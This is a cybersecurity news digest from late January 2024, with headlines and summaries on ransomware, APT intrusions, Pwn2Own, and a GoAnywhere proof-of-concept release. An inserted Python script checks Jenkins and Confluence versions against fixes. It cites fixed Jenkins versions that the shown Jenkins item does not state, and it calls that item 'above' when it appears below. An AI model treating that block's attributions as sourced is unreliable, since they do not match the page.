            The Kansas City Area Transportation Authority (KCATA) announced it was targeted by a ransomware attack on Tuesday, January 23. [...]

            Autosummary: "All service is operating, including fixed-route buses, Freedom and Freedom-On-Demand paratransit service," explained KCATA.


            Emerging trends and strategies in digital forensics

            industry
            2024-01-26 https://www.helpnetsecurity.com/2024/01/26/amber-schroader-paraben-digital-forensics-trends/
            In this Help Net Security interview, Amber Schroader, CEO at Paraben Corporation, discusses the challenges posed by the complexity of modern computer systems and networks on digital evidence collection. Schroader talks about the impact of exponential data growth on forensic practices, the role of AI in optimizing investigations, and emphasizes the need for professionals to adapt to the changing dynamics of digital investigations, along with cross-education in related fields. How has the complexity of modern … More

            Autosummary: Schroader talks about the impact of exponential data growth on forensic practices, the role of AI in optimizing investigations, and emphasizes the need for professionals to adapt to the changing dynamics of digital investigations, along with cross-education in related fields. The cross-sharing of app data and just data, in general, has been streamlined, and our investigative scope is changing as well.


            Russian TrickBot Mastermind Gets 5-Year Prison Sentence for Cybercrime Spree

            rusia-ucrania
            2024-01-26 https://thehackernews.com/2024/01/russian-trickbot-mastermind-gets-5-year.html
            40-year-old Russian national Vladimir Dunaev has been sentenced to five years and four months in prison for his role in creating and distributing the TrickBot malware, the U.S. Department of Justice (DoJ) said. The development comes nearly two months after Dunaev pleaded guilty to committing computer fraud and identity theft and conspiracy to commit wire fraud and bank fraud.

            Autosummary: Cybersecurity firm Intel 471 said Ermakov went by various online aliases such as blade_runner, GustaveDore, JimJones, aiiis_ermak, GistaveDore, gustavedore, GustaveDore, Gustave7Dore, ProgerCC, SHTAZI, and shtaziIT.


            What makes ransomware victims less likely to pay up?

            exploits ransomware
            2024-01-26 https://www.helpnetsecurity.com/2024/01/26/what-makes-ransomware-victims-less-likely-to-pay-up/
            There’s a good reason why ransomware gangs started exfiltrating victims’ data instead of just encrypting it: those organizations pay more. University of Twente researcher Tom Meurs and his colleagues wanted to know which factors influence victims to pay the ransom or not, and which factors have an effect on the ransom amount organizations end up paying. Based on the data provided by the Dutch National Police and a Dutch incident response organisation on 481 ransomware … More


            Pwn2Own Automotive 2024 Day 2 – Tesla hacked again

            industry
            2024-01-26 https://securityaffairs.com/158141/hacking/pwn2own-automotive-2024-day-two.html
            Researchers hacked the Tesla infotainment system and found 24 zero-days on day 2 of the Pwn2Own Automotive 2024 hacking competition. White hat hackers from the Synacktiv Team (@Synacktiv) compromised the Tesla infotainment system on the second day of the Pwn2Own Automotive 2024 hacking competition. The bug hunters chained two vulnerabilities to hack the Tesla infotainment system, […]

            Autosummary: By Pierluigi Paganini, January 26, 2024. Researchers hacked the Tesla infotainment system and found 24 zero-days on day 2 of the Pwn2Own Automotive 2024 hacking competition.


            Mining giants told to pay $9.7bn over Brazil dam disaster

            latam
            2024-01-26 https://www.bbc.co.uk/news/business-68102511?at_medium=RSS&at_campaign=KARANGA
            The 2015 collapse of the Fundão dam in Brazil caused a giant mudslide that killed 19 people.


            Pwn2Own Automotive: $1.3M for 49 zero-days, Tesla hacked twice

            exploits industry
            2024-01-26 https://www.bleepingcomputer.com/news/security/pwn2own-automotive-13m-for-49-zero-days-tesla-hacked-twice/
            The first edition of Pwn2Own Automotive has ended with competitors earning $1,323,750 for hacking Tesla twice and demoing 49 zero-day bugs in multiple electric car systems between January 24 and January 26. [...]


            Russian Midnight Blizzard APT is targeting orgs worldwide, Microsoft warns

            rusia-ucrania
            2024-01-26 https://securityaffairs.com/158164/apt/midnight-blizzard-apt-cyberespionage.html
            Microsoft revealed that the Russia-linked APT Midnight Blizzard has been targeting organizations worldwide in a cyberespionage campaign. Microsoft announced that Midnight Blizzard, the Russia-linked APT that hit the company in late November 2023, has been targeting organizations worldwide as part of a large-scale cyberespionage campaign. The IT giant also confirmed that it is currently notifying impacted organizations. […]

            Autosummary: The Midnight Blizzard group (aka APT29, SVR group, Cozy Bear, Nobelium, BlueBravo, and The Dukes), along with the APT28 cyber espionage group, was involved in the Democratic National Committee hack and the wave of attacks aimed at the 2016 US Presidential Elections.


            Ukraine: Hack wiped 2 petabytes of data from Russian research center

            rusia-ucrania
            2024-01-26 https://www.bleepingcomputer.com/news/security/ukraine-hack-wiped-2-petabytes-of-data-from-russian-research-center/
            The Main Intelligence Directorate of Ukraine's Ministry of Defense claims that pro-Ukrainian hacktivists breached the Russian Center for Space Hydrometeorology, aka "planeta" (планета), and wiped 2 petabytes of data. [...]

            Autosummary: "Among the destroyed data are meteorological and satellite data, which were actively used in constant mode by the Ministry of Defense and MNS RF, "Roscosmos," and several other state agencies-aggressors, as well as years of unique research," reads the announcement (machine translated).


            Role of Wazuh in building a robust cybersecurity architecture

            ciber
            2024-01-26 https://www.bleepingcomputer.com/news/security/role-of-wazuh-in-building-a-robust-cybersecurity-architecture/
            Leveraging open source solutions and tools to build a cybersecurity architecture offers organizations several benefits. Learn more from Wazuh about the benefits of open source solutions. [...]

            Autosummary: Wazuh plays a significant role in implementing a cyber security architecture, providing a platform for security information and event management, active response, compliance monitoring, and more. Leveraging open source solutions and tools to build a cybersecurity architecture offers organizations several benefits, such as cost-effectiveness, flexibility, community support, and transparency.


            A TrickBot malware developer sentenced to 64 months in prison

            exploits
            2024-01-26 https://securityaffairs.com/158194/cyber-crime/trickbot-dev-sentenced-64-months-jail.html
            The Russian national malware developer Vladimir Dunaev was sentenced to more than 5 years in prison for his role in the TrickBot operation. The Russian national Vladimir Dunaev (40) has been sentenced in the US to 64 months in prison for his role in the development and distribution of the TrickBot malware. Vladimir Dunaev was […]

            Autosummary: By Pierluigi Paganini, January 26, 2024. The Russian national malware developer Vladimir Dunaev was sentenced to more than 5 years in prison for his role in the TrickBot operation.


            CISA adds Atlassian Confluence Data Center bug to its Known Exploited Vulnerabilities catalog

            exploits
            2024-01-25 https://securityaffairs.com/158086/hacking/cisa-adds-atlassian-confluence-data-center-bug-to-its-known-exploited-vulnerabilities-catalog.html
            The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added an Atlassian Confluence Data Center and Server template injection bug to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an Atlassian Confluence Data Center and Server template injection bug, tracked as CVE-2023-22527, to its Known Exploited Vulnerabilities (KEV) catalog. Atlassian recently warned of a critical […]

            Autosummary: The company addressed the vulnerability with the release of versions 8.5.4 (LTS), 8.6.0 (Data Center only), and 8.7.1 (Data Center only).
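The Jenkins and Confluence items above both come down to the same operational question: is the build I am running at or above the fixed version for its release line? Getting that wrong is easy when a product ships parallel lines (Jenkins weekly 2.442 versus LTS 2.426.3; Confluence 8.5.4, 8.6.0 and 8.7.1), because a naive string or tuple comparison of an LTS version against the weekly fix answers incorrectly in both directions. The script below is an added example written for this page, not code from Jenkins, Atlassian, CISA or any of the articles. The fixed versions are the ones stated in the two items; the use of the `X-Jenkins` response header to learn a Jenkins version is an assumption about the server (Jenkins normally sends it), and the HTTP response it parses is a constructed sample, not a capture from a real host. A Confluence version on a line other than 8.5, 8.6 or 8.7 is reported as `unknown` rather than guessed at, since the item gives no fix for other lines.

```python
"""Classify Jenkins / Confluence versions against fixed releases.

Fixed versions as stated in the news items above:
  Jenkins (CVE-2024-23897):   weekly 2.442, LTS 2.426.3
  Confluence (CVE-2023-22527): 8.5.4 (LTS), 8.6.0, 8.7.1
Added example for this page; not the vendors' own code.
"""
import re

# Release line -> first fixed version on that line, as tuples for comparison.
FIXES = {
    # Jenkins: a two-component version (2.N) is a weekly release,
    # a three-component version (2.N.M) is an LTS release.
    "jenkins": {"weekly": (2, 442), "lts": (2, 426, 3)},
    # Confluence: keyed by the "major.minor" line the fix was shipped for.
    "confluence": {"8.5": (8, 5, 4), "8.6": (8, 6, 0), "8.7": (8, 7, 1)},
}

# Jenkins advertises its version in this header (assumption: not disabled by a proxy).
X_JENKINS = re.compile(r"^X-Jenkins:\s*(\S+)", re.IGNORECASE | re.MULTILINE)


def parse_version(text):
    """'2.426.3' -> (2, 426, 3). A trailing suffix such as '-SNAPSHOT' is ignored."""
    m = re.match(r"^(\d+(?:\.\d+)*)", text.strip())
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(part) for part in m.group(1).split("."))


def jenkins_status(version):
    """'patched' or 'vulnerable' for CVE-2024-23897.

    The release line is decided first: comparing LTS 2.426.3 against the
    weekly fix 2.442 would wrongly call a patched LTS vulnerable, and comparing
    weekly 2.441 against 2.426.3 would wrongly call an unpatched weekly safe.
    """
    parts = parse_version(version)
    line = "lts" if len(parts) >= 3 else "weekly"
    return "patched" if parts >= FIXES["jenkins"][line] else "vulnerable"


def confluence_status(version):
    """'patched', 'vulnerable' or 'unknown' for CVE-2023-22527.

    Only the 8.5, 8.6 and 8.7 lines have a stated fix; anything else is
    'unknown' so the caller checks the vendor advisory instead of trusting a guess.
    """
    parts = parse_version(version)
    line = ".".join(str(p) for p in parts[:2])
    fix = FIXES["confluence"].get(line)
    if fix is None:
        return "unknown"
    return "patched" if parts >= fix else "vulnerable"


def jenkins_version_from_headers(raw_headers):
    """Extract the version from an X-Jenkins header block; None if absent."""
    m = X_JENKINS.search(raw_headers)
    return m.group(1) if m else None


# Constructed sample response (not captured from a real server).
SAMPLE_HEADERS = """HTTP/1.1 403 Forbidden
X-Content-Type-Options: nosniff
X-Hudson: 1.395
X-Jenkins: 2.426.2
X-Jenkins-Session: 0123abcd
Content-Type: text/html;charset=utf-8
"""


def main():
    version = jenkins_version_from_headers(SAMPLE_HEADERS)
    print(f"Jenkins {version}: {jenkins_status(version)}")
    for cv in ("8.5.3", "8.5.4", "8.6.0", "8.7.0", "8.7.1", "8.4.5"):
        print(f"Confluence {cv}: {confluence_status(cv)}")


if __name__ == "__main__":
    main()
```

In practice the header block would come from a `HEAD` request against the Jenkins base URL with the scanner of your choice; the sample here stands in for that response. The `unknown` outcome for Confluence is deliberate: the fix table only encodes what the advisory item states, so an 8.8 or 7.x build gets a prompt to look it up rather than a false "patched".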


            Tech Giant HP Enterprise Hacked by Russian Hackers Linked to DNC Breach

            rusia-ucrania
            2024-01-25 https://thehackernews.com/2024/01/tech-giant-hp-enterprise-hacked-by.html
            Hackers with links to the Kremlin are suspected to have infiltrated information technology company Hewlett Packard Enterprise's (HPE) cloud email environment to exfiltrate mailbox data. "The threat actor accessed and exfiltrated data beginning in May 2023 from a small percentage of HPE mailboxes belonging to individuals in our cybersecurity, go-to-market, business segments, and other functions,"


            New CherryLoader Malware Mimics CherryTree to Deploy PrivEsc Exploits

            exploits industry
            2024-01-25 https://thehackernews.com/2024/01/new-cherryloader-malware-mimics.html
            A new Go-based malware loader called CherryLoader has been discovered by threat hunters in the wild, delivering additional payloads onto compromised hosts for follow-on exploitation. Arctic Wolf Labs, which discovered the new attack tool in two recent intrusions, said the loader's icon and name masquerade as the legitimate CherryTree note-taking application to dupe potential victims


            Patch now! Fortra GoAnywhere MFT vulnerability exploit available

            exploits
            2024-01-25 https://www.malwarebytes.com/blog/news/2024/01/patch-now-fortra-goanywhere-mft-vulnerability-exploit-available
            A new vulnerability in Fortra GoAnywhere MFT now has exploit code available that allows an attacker to create a new admin user.

            Autosummary: On January 22, 2024, software company Fortra warned customers about a new authentication bypass vulnerability impacting GoAnywhere MFT (Managed File Transfer) that allows an attacker to create a new admin user.


            Russian hackers breached Microsoft, HPE corporate mailboxes

            rusia-ucrania
            2024-01-25 https://www.helpnetsecurity.com/2024/01/25/cozy-bear-microsoft-hpe/
            Cozy Bear (aka Midnight Blizzard, aka APT29) has been busy hacking and spying on big tech companies: both Microsoft and Hewlett Packard Enterprise (HPE) have recently disclosed successful attack campaigns by the Russia-affiliated APT group. The Microsoft breach: last Friday, Microsoft revealed that a threat actor identified as Midnight Blizzard – a hacking group believed to be associated with the Russian Foreign Intelligence Service (SVR) – breached its corporate systems on January 12, 2024. The … More


            Blackwood APT delivers malware by hijacking legitimate software update requests

            exploits
            2024-01-25 https://www.helpnetsecurity.com/2024/01/25/blackwood-apt-nspx30/
            ESET researchers have discovered NSPX30, a sophisticated implant used by a new China-aligned APT group, which they dubbed Blackwood. Blackwood has carried out cyberespionage operations against individuals and companies from China, Japan, and the United Kingdom. It leverages adversary-in-the-middle techniques to hijack update requests from legitimate software to deliver the implant. ESET mapped the evolution of NSPX30 back to an earlier ancestor – a simple backdoor they have named Project Wood. The oldest sample found … More

            Autosummary: “However, based on our own experience with China-aligned threat actors who exhibit these capabilities, as well as recent research on router implants attributed to another China-aligned group, MustangPanda, we speculate that the attackers are deploying a network implant within the networks of the victims, possibly on vulnerable network appliances, such as routers or gateways,” explains Muñoz.


            AI expected to increase volume, impact of cyberattacks

            ciber
            2024-01-25 https://www.helpnetsecurity.com/2024/01/25/ai-increase-cyberattacks/
            All types of cyber threat actors are already using artificial intelligence (AI) to varying degrees, UK National Cyber Security Centre analysts say, and they predict that AI “will almost certainly increase the volume and heighten the impact of cyberattacks over the next two years.” AI lowers the barrier for less skilled hackers, making it easier for them to gather information and pull off successful compromises of devices and accounts, they also noted. “This enhanced access will … More

            Autosummary: AI is upskilling less-skilled hackers. Although AI is used by all types of cyber threat actors, it will particularly benefit less-skilled ones, as it will enhance their ability to carry out social engineering attacks and create convincing phishing emails.


            Critical Jenkins Vulnerability Exposes Servers to RCE Attacks - Patch ASAP!

            exploits
            2024-01-25 https://thehackernews.com/2024/01/critical-jenkins-vulnerability-exposes.html
            The maintainers of the open-source continuous integration/continuous delivery and deployment (CI/CD) automation software Jenkins have resolved nine security flaws, including a critical bug that, if successfully exploited, could result in remote code execution (RCE). The issue, assigned the CVE identifier CVE-2024-23897, has been described as an arbitrary file read vulnerability through the


            LODEINFO Fileless Malware Evolves with Anti-Analysis and Remote Code Tricks

            exploits
            2024-01-25 https://thehackernews.com/2024/01/lodeinfo-fileless-malware-evolves-with.html
            Cybersecurity researchers have uncovered an updated version of a backdoor called LODEINFO that's distributed via spear-phishing attacks. The findings come from Japanese company ITOCHU Cyber & Intelligence, which said the malware "has been updated with new features, as well as changes to the anti-analysis (analysis avoidance) techniques." LODEINFO (versions 0.6.6 and 0.6.7

            Autosummary: The backdoor is the work of a Chinese nation-state actor known as Stone Panda (aka APT10, Bronze Riverside, Cicada, Earth Tengshe, MirrorFace, and Potassium), which has a history of orchestrating attacks targeting Japan since 2021.


            Tesla hacked again, 24 more zero-days exploited at Pwn2Own Tokyo

            exploits
            2024-01-25 https://www.bleepingcomputer.com/news/security/tesla-hacked-again-24-more-zero-days-exploited-at-pwn2own-tokyo/
            Security researchers hacked the Tesla infotainment system and demoed a total of 24 zero-days on the second day of the Pwn2Own Automotive 2024 hacking competition. [...]


            AI likely to boost ransomware, warns government body

            exploits government ransomware
            2024-01-25 https://www.malwarebytes.com/blog/news/2024/01/ai-likely-to-boost-ransomware-warns-government-body
            The NCSC issued a report that warns about the growth and impact of malware, especially ransomware, due to the availability of AI.

            Autosummary: The NCSC expects that by 2025, GenAI and large language models (LLMs) will make it difficult for everyone, regardless of their cybersecurity posture, to assess whether an email or password reset request is genuine, or to identify phishing, spoofing, or other social engineering attempts. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Generative AI (GenAI) can already be used to create and sustain a convincing interaction with victims, including the creation of lure documents, without the translation, spelling, and grammatical errors that used to reveal phishing.


            AI is already being used by ransomware gangs, warns NCSC

            exploits ransomware
            2024-01-25 https://www.tripwire.com/state-of-security/ncsc-warns-ai-already-being-used-ransomware-gangs
            In a newly published report, the UK's National Cyber Security Centre (NCSC) has warned that malicious attackers are already taking advantage of artificial intelligence and that the volume and impact of threats - including ransomware - will increase in the next two years. Read more in my article on the Tripwire State of Security blog.


            SystemBC Malware's C2 Server Analysis Exposes Payload Delivery Tricks

            exploits
            2024-01-25 https://thehackernews.com/2024/01/systembc-malwares-c2-server-analysis.html
            Cybersecurity researchers have shed light on the command-and-control (C2) server of a known malware family called SystemBC. "SystemBC can be purchased on underground marketplaces and is supplied in an archive containing the implant, a command-and-control (C2) server, and a web administration portal written in PHP," Kroll said in an analysis published last week. The risk and


            23andMe data breach: Hackers stole raw genotype data, health reports

            financial
            2024-01-25 https://www.bleepingcomputer.com/news/security/23andme-data-breach-hackers-stole-raw-genotype-data-health-reports/
            Genetic testing provider 23andMe confirmed that hackers stole health reports and raw genotype data of customers affected by a credential stuffing attack that went unnoticed for five months, from April 29 to September 27. [...]

            Autosummary: Ancestry reports and matching DNA segments (specifically where on your chromosomes you and your relative had matching DNA); self-reported location (city/zip code); ancestor birth locations and family names; profile picture, birth year, and anything else included in their profile's "Introduce yourself" section. 23andMe told BleepingComputer in December that the hackers downloaded the data of 6.9 million people of the existing 14 million customers after breaching around 14,000 user accounts.


            Blackwood hackers hijack WPS Office update to install malware

            exploits
            2024-01-25 https://www.bleepingcomputer.com/news/security/blackwood-hackers-hijack-wps-office-update-to-install-malware/
            A previously unknown advanced threat actor tracked as "Blackwood" is using sophisticated malware called NSPX30 in cyberespionage attacks against companies and individuals. [...]

            Autosummary: Evolutionary timeline (ESET). Unlike its predecessors, NSPX30 is characterized by its multistage architecture, which includes components like a dropper, a DLL installer with extensive UAC bypassing capabilities, a loader, an orchestrator, and a backdoor, each with its own set of plugins.


            Russian TrickBot malware dev sentenced to 64 months in prison

            exploits rusia-ucrania
            2024-01-25 https://www.bleepingcomputer.com/news/security/russian-trickbot-malware-dev-sentenced-to-64-months-in-prison/
            Russian national Vladimir Dunaev has been sentenced to five years and four months in prison for his role in creating and distributing the Trickbot malware used in attacks against hospitals, companies, and individuals worldwide. [...]

            Autosummary: The TrickBot malware he helped develop enabled cybercriminals to collect infected victims' sensitive information (such as login credentials, credit card information, emails, passwords, social security numbers, and addresses) and siphon off funds from victims' bank accounts. Dunaev is the second TrickBot malware dev prosecuted by the U.S. Department of Justice after Latvian national Alla Witte (aka Max) was apprehended in February 2021 and charged with helping develop the module designed to deploy ransomware on compromised networks.


            Malwarebytes wins every MRG Effitas award for 2 years in a row

            exploits
            2024-01-25 https://www.malwarebytes.com/blog/business/2024/01/malwarebytes-wins-mrg-effitas-award-for-2-years-in-a-row
            ThreatDown has earned 37/37 awards over nine consecutive quarters.

            Autosummary: ThreatDown Endpoint Protection (EP) achieved the highest possible score (100%) and received certifications for Level 1, Exploit, Online Banking, and Ransomware in the most recent anti-malware efficacy assessment results for the Q3 2023 evaluation performed by MRG Effitas, a world leader in independent IT research. MRG Effitas assesses a product’s ability to meet today’s most pressing threats in the wild, such as stopping zero-day malware, ransomware, and exploits, and doing so with speedy performance and low false positives.


            Cisco warns of a critical bug in Unified Communications products, patch it now!

            exploits
            2024-01-25 https://securityaffairs.com/158116/security/cisco-unified-communications-critical-flaw.html
            Cisco addressed a critical flaw in its Unified Communications and Contact Center Solutions products that could lead to remote code execution. Cisco released security patches to address a critical vulnerability, tracked as CVE-2024-20253 (CVSS score of 9.9), impacting multiple Unified Communications and Contact Center Solutions products. An unauthenticated, remote attacker can exploit the flaw to […]



            Assessing and mitigating supply chain cybersecurity risks

            ciber
            2024-01-25 https://www.welivesecurity.com/en/business-security/assessing-mitigating-cybersecurity-risks-supply-chain/
            Blindly trusting your partners and suppliers on their security posture is not sustainable – it's time to take control through effective supplier risk management.

            Autosummary: Whatever the specific supply chain risk type, the end result could be the same: financial and reputational damage and the risk of lawsuits, operational outages, lost sales and angry customers. As such, it serves as a foundational document outlining expectations, standards, and procedures that suppliers must adhere to in order to ensure the security of the overall supply chain. They may impact traditional suppliers such as professional services firms (e.g., lawyers, accountants), or vendors of business software. In the US last year, there were 40% more supply chain attacks than malware-based attacks, according to one report. In a more recent case, popular file transfer software MOVEit was compromised by a zero-day vulnerability and data stolen from hundreds of corporate users, impacting millions of their customers.


            Prioritizing CIS Controls for effective cybersecurity across organizations

            ciber
            2024-01-24 https://www.helpnetsecurity.com/2024/01/24/randy-marchany-virginia-tech-cis-controls-implementation/

            In this Help Net Security interview, Randy Marchany, CISO at Virginia Tech, discusses the challenges and strategies associated with implementing CIS Controls in organizations of varying sizes. Marchany explores the importance of securing top-level management support, breaking down data silos, and setting realistic timelines for project completion. The discussion also highlights the prioritization of key controls for inventory management, the use of metrics to measure implementation effectiveness and the adaptation of CIS Controls for different … More

            The post Prioritizing CIS Controls for effective cybersecurity across organizations appeared first on Help Net Security.

            Autosummary: NIST 800-53a Rev 5 Moderate/Low, NIST 800-171, PCI 4.0, Australian Signal Directorate's Essential Eight, UK NCSC Cyber Essentials v.2.2, CMMC 2.0, HIPAA, NERC-CIP, COBIT 5, SWIFT are among the standards that can map to the CIS Controls. While the CIS doesn't recommend any particular order to implementing the controls, I would recommend starting with controls 1-3, which determine your hardware, software, and most importantly, your sensitive data inventories. The implementation team(s) need to a) determine what data is needed to implement a particular control, b) find the unit within the organization that has control access to this data, and c) get this information from these units.


            The effect of omission bias on vulnerability management

            exploits
            2024-01-24 https://www.helpnetsecurity.com/2024/01/24/vulnerability-management-omission-bias/

            Whether we’d like to admit it to ourselves or not, all humans harbor subconscious biases that powerfully influence our behavior. One of these is the omission bias, which has interesting ramifications in the world of cyber security, specifically vulnerability management. In this article, we discuss omission bias in vulnerability management, particularly vulnerability remediation, and how IT operators can overcome it with today’s new management platforms. Vulnerability management Omission bias is the human tendency to assume … More

            The post The effect of omission bias on vulnerability management appeared first on Help Net Security.

            Autosummary: In this article, we discuss omission bias in vulnerability management, particularly vulnerability remediation, and how IT operators can overcome it with today's new management platforms. A cyber-attack resulting from a specific exposed vulnerability is possible but not guaranteed, and certainly not an immediate concern, but an applied patch that causes a serious disruption is a personal memory many IT professionals can recall vividly, and when it happens, the consequences couldn't be more immediate.


            10 USA cybersecurity conferences you should visit in 2024

            ciber
            2024-01-24 https://www.helpnetsecurity.com/2024/01/24/10-usa-cybersecurity-conferences-you-should-visit-in-2024/

            Security BSides Security BSides offers attendees an opportunity to engage and present their ideas actively. Characterized by its intensity, these events are filled with discussions, demonstrations, and interactive participation. BSides are happening all over the USA. To find an event near you, visit their website. AI for Automotive Cybersecurity USA 19 – 21 March, 2024 | Ann Arbor This event features industry professionals from automotive cybersecurity, artificial intelligence, machine learning, quantum computing, R&D, LLM, and … More

            The post 10 USA cybersecurity conferences you should visit in 2024 appeared first on Help Net Security.

            Autosummary: 9 – 12 April, 2024 | Las Vegas At ISC West, you will have the chance to network and connect with thousands of security and public safety professionals, learn from the SIA Education@ISC program, plus explore the latest technologies in cybersecurity, access control, alarms and monitoring, and video surveillance while discovering emerging trends in connected IoT, smart home, and more.


            U.S., U.K., Australia Sanction Russian REvil Hacker Behind Medibank Breach

            financial rusia-ucrania
            2024-01-24 https://thehackernews.com/2024/01/us-uk-australia-sanction-russian-revil.html
            Governments from Australia, the U.K., and the U.S. have imposed financial sanctions on a Russian national for his alleged role in the 2022 ransomware attack against health insurance provider Medibank. Alexander Ermakov (aka blade_runner, GistaveDore, GustaveDore, or JimJones), 33, has been tied to the breach of the Medibank network as well as the theft and release of Personally Identifiable


            Tesla hacked, 24 zero-days demoed at Pwn2Own Automotive 2024

            exploits industry
            2024-01-24 https://www.bleepingcomputer.com/news/security/tesla-hacked-24-zero-days-demoed-at-pwn2own-automotive-2024/
            Security researchers hacked a Tesla Modem and collected awards of $722,500 on the first day of Pwn2Own Automotive 2024 for three bug collisions and 24 unique zero-day exploits. [...]


            Windows 11 KB5034204 update fixes Bluetooth audio issues, 24 bugs

            exploits
            2024-01-24 https://www.bleepingcomputer.com/news/microsoft/windows-11-kb5034204-update-fixes-bluetooth-audio-issues-24-bugs/
            Microsoft released the January 2024 preview update for Windows 11 versions 22H2 and 23H2, which comes with Bluetooth audio bug fixes and addresses 24 known issues. [...]

            Autosummary: More highlights in this month's preview update This Windows 11 optional release comes with additional fixes and improvements, some of the more significant ones listed below: This update addresses an issue that causes your device to stop responding.


            Update now! Apple releases patch for zero-day vulnerability

            exploits
            2024-01-24 https://www.malwarebytes.com/blog/news/2024/01/update-now-apple-releases-patch-for-zero-day-vulnerability
            Apple has released new security updates for several products including a patch for a zero-day vulnerability which may have been exploited.

            Autosummary: This issue is fixed in tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3, macOS


            PoC exploit for easily exploitable Fortra GoAnywhere MFT vulnerability released (CVE-2024-0204)

            exploits
            2024-01-24 https://www.helpnetsecurity.com/2024/01/24/poc-cve-2024-0204/

            Proof-of-concept (PoC) exploit code for a critical vulnerability (CVE-2024-0204) in Fortra’s GoAnywhere MFT solution has been made public, sparking fears that attackers may soon take advantage of it. Fortra’s GoAnywhere MFT is a web-based managed file transfer solution widely used by organizations of all sizes. In early 2023, the Cl0P ransomware gang exploited a zero-day vulnerability (CVE-2023-0669) in the same solution to exfiltrate data of 130+ victim organizations, and followed up with threats to publish … More

            The post PoC exploit for easily exploitable Fortra GoAnywhere MFT vulnerability released (CVE-2024-0204) appeared first on Help Net Security.

            Autosummary: In early 2023, the Cl0P ransomware gang exploited a zero-day vulnerability (CVE-2023-0669) in the same solution to exfiltrate data of 130+ victim organizations, and followed up with threats to publish it if they didn't get paid not to.


            Stellar Cyber partners with Proofpoint to speed detection of email-driven cyberattacks

            ciber
            2024-01-24 https://www.helpnetsecurity.com/2024/01/24/stellar-cyber-proofpoint-partnership/

            Stellar Cyber announced a new partnership with Proofpoint, a cybersecurity and compliance company. Through this alliance, Proofpoint and Stellar Cyber customers benefit from an out-of-the-box integration enabling swift email investigations and real-time response actions to email-driven attacks. Proofpoint Targeted Attack Protection monitors emails to identify suspicious emails and potentially malicious attachments and URLs. Once identified, the findings are shared with Stellar Cyber automatically. Stellar Cyber’s Open XDR platform ingests, normalizes, and analyzes Proofpoint findings and … More

            The post Stellar Cyber partners with Proofpoint to speed detection of email-driven cyberattacks appeared first on Help Net Security.



            Kasseika Ransomware Using BYOVD Trick to Disarm Security Pre-Encryption

            exploits ransomware
            2024-01-24 https://thehackernews.com/2024/01/kasseika-ransomware-using-byovd-trick.html
            The ransomware group known as Kasseika has become the latest to leverage the Bring Your Own Vulnerable Driver (BYOVD) attack to disarm security-related processes on compromised Windows hosts, joining the likes of other groups like Akira, AvosLocker, BlackByte, and RobbinHood. The tactic allows "threat actors to terminate antivirus processes and services for the deployment of ransomware," Trend

            Autosummary: BianLian has been an active and prevalent threat group since September 2022, predominantly singling out healthcare, manufacturing, professional, and legal services sectors in the U.S., the U.K., Canada, India, Australia, Brazil, Egypt, France, Germany, and Spain.


            Akira ransomware attack on Tietoevry disrupted the services of many Swedish organizations

            exploits ransomware
            2024-01-24 https://securityaffairs.com/158031/cyber-crime/tietoevry-akira-ransomware-attack.html
            A ransomware attack against the Finnish IT services provider Tietoevry disrupted the services of some Swedish government agencies and shops. The online services of multiple Swedish government agencies, universities, and commercial activities were disrupted by an Akira ransomware attack that hit the Finnish IT services and enterprise cloud hosting Tietoevry. Tietoevry is a Finnish multinational […]

            Autosummary: (Pierluigi Paganini, January 24, 2024) A ransomware attack against the Finnish IT services provider Tietoevry disrupted the services of some Swedish government agencies and shops. The Akira ransomware has been active since March 2023; the threat actors behind the malware claim to have already hacked multiple organizations in multiple industries, including education, finance, and real estate.


            UK says AI will empower ransomware over the next two years

            exploits ransomware
            2024-01-24 https://www.bleepingcomputer.com/news/security/uk-says-ai-will-empower-ransomware-over-the-next-two-years/
            The United Kingdom's National Cyber Security Centre (NCSC) warns that artificial intelligence (AI) tools will have an adverse near-term impact on cybersecurity, helping escalate the threat of ransomware. [...]

            Autosummary: "Threat actors, including ransomware actors, are already using AI to increase the efficiency and effectiveness of aspects of cyber operations, such as reconnaissance, phishing and coding," warns the NCSC in a separate threat assessment.


            Global fintech firm EquiLend offline after recent cyberattack

            ciber
            2024-01-24 https://www.bleepingcomputer.com/news/security/global-fintech-firm-equilend-offline-after-recent-cyberattack/
            New York-based global financial technology firm EquiLend says its operations have been disrupted after some systems were taken offline in a Monday cyberattack. [...]

            Autosummary: EquiLend was founded in 2001 by a consortium of ten global banks and broker-dealers, including Bank of America Merrill Lynch, BlackRock, Credit Suisse, Goldman Sachs, JP Morgan, Morgan Stanley, National Bank of Canada, Northern Trust, State Street, and UBS.


            Experts released PoC exploit for Fortra GoAnywhere MFT flaw CVE-2024-0204

            exploits
            2024-01-24 https://securityaffairs.com/158043/hacking/goanywhere-mft-cve-2024-0204-poc-exploit.html
            Researchers released PoC exploit code for a recently disclosed critical authentication bypass flaw in Fortra's GoAnywhere MFT (Managed File Transfer). Researchers with cybersecurity firm Horizon3's Attack Team published technical details of the recently disclosed vulnerability CVE-2024-0204 impacting Fortra GoAnywhere MFT. The security experts also published a proof-of-concept (PoC) exploit that allows the creation of new admin users on vulnerable […]

            Autosummary: (Pierluigi Paganini, January 24, 2024) Researchers released PoC exploit code for a recently disclosed critical authentication bypass flaw in Fortra's GoAnywhere MFT (Managed File Transfer). In February 2023, the Clop ransomware group claimed to have stolen sensitive data from over 130 organizations by exploiting another zero-day vulnerability (CVE-2023-0669) in Fortra's GoAnywhere Managed File Transfer secure file transfer tool.


            HPE: Russian hackers breached its security team’s email accounts

            rusia-ucrania
            2024-01-24 https://www.bleepingcomputer.com/news/security/hpe-russian-hackers-breached-its-security-teams-email-accounts/
            Hewlett Packard Enterprise (HPE) disclosed today that suspected Russian hackers known as Midnight Blizzard gained access to the company's Microsoft Office 365 email environment to steal data from its cybersecurity team and other departments. [...]

            Autosummary: "Based on our investigation, we now believe that the threat actor accessed and exfiltrated data beginning in May 2023 from a small percentage of HPE mailboxes belonging to individuals in our cybersecurity, go-to-market, business segments, and other functions," reads the SEC filing.


            2024 State of Ransomware in Education: 92% spike in K-12 attacks

            exploits government ransomware
